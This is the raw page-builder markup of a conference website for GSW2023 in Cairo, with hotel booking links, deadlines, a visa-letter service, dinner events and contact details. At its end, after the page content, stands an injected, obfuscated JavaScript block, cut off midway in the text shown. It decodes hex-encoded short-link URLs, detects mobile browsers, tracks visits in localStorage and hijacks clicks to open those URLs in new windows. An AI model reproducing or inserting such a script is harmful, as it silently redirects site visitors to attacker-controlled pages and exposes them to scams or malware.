will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 